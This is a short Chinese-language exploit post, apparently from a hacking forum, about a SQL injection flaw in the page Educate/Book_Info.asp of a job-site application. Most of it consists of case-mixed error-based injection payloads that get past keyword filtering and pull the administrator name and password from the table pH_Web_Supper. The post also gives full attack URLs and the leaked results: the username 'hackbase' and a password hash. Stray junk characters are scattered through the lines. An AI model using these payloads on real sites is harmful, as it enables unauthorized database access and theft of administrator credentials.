漏洞出现在Educate/Book_Info.asp
6 f. S+ x; s) _" a2 |+ Y3 j! [此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出' o$ \0 x1 n- p( p2 {3 t! C
exp:如下
+ R# N! g, j0 K: M6 K查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)$ Z, h/ f) E1 U8 s2 W9 O8 k# R
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 L" g+ |/ J. O
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
C% `# B2 I. }% YMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
$ Y7 C; W% \1 o" U* c: H9 x) S将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。# o& I& \, B6 w, X5 ^' k6 k
/Educate/Book_Info.asp,行 8+ d; q' E [5 D
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; G' j. M4 {1 l; ^6 YMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
5 n( [+ c# ]% {' l5 u$ A- `* \+ v; N将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
: b5 z8 {) F0 W0 _/ Y/Educate/Book_Info.asp,行 8 |